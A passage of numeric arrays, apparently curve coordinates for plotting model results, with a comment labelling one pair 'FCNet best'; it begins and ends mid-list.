0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.375, 0.3958333333333333, 0.3958333333333333, 0.3958333333333333, 0.3958333333333333, 0.3958333333333333, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4791666666666667, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5208333333333334, 0.5208333333333334, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.6041666666666666, 0.6041666666666666, 0.6041666666666666, 0.6041666666666666, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.7708333333333334, 0.7708333333333334, 0.7708333333333334, 0.7708333333333334, 0.7916666666666666, 0.7916666666666666, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334] , [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.08333333333333333, 0.09722222222222222, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.125, 0.125, 0.125, 0.125, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1527777777777778, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.2361111111111111, 0.2361111111111111, 0.25, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2777777777777778, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3194444444444444, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.4027777777777778, 0.4027777777777778, 0.4027777777777778, 0.4166666666666667, 0.4166666666666667, 0.4305555555555556, 0.4444444444444444, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4861111111111111, 0.4861111111111111, 0.4861111111111111, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5833333333333334, 0.5833333333333334, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.6111111111111112, 0.6111111111111112, 0.6111111111111112, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6388888888888888, 0.6388888888888888, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7222222222222222, 0.7222222222222222, 0.7361111111111112, 0.7361111111111112, 0.7361111111111112, 0.75, 0.75, 0.75, 0.75, 0.7638888888888888, 0.7638888888888888, 0.7638888888888888, 0.7638888888888888, 0.7916666666666666, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8194444444444444, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8472222222222222, 0.8611111111111112, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.9027777777777778, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9722222222222222, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] # FCNet best x3, y3 = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9464285714285714, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9107142857142857, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.875, 0.875, 0.875, 0.875, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8392857142857143, 0.8214285714285714, 0.8214285714285714, 0.8214285714285714, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.7857142857142857, 0.7857142857142857, 0.7857142857142857, 0.7678571428571429, 0.7678571428571429, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.7321428571428571, 0.7321428571428571, 0.6964285714285714, 0.6964285714285714, 0.6964285714285714, 0.6964285714285714, 0.6785714285714286, 0.6785714285714286, 0.6607142857142857, 0.6607142857142857, 0.6607142857142857, 0.6607142857142857, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6071428571428571, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5535714285714286, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.4107142857142857, 0.4107142857142857, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.2857142857142857, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.25, 0.25, 0.25, 0.25, 0.25, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 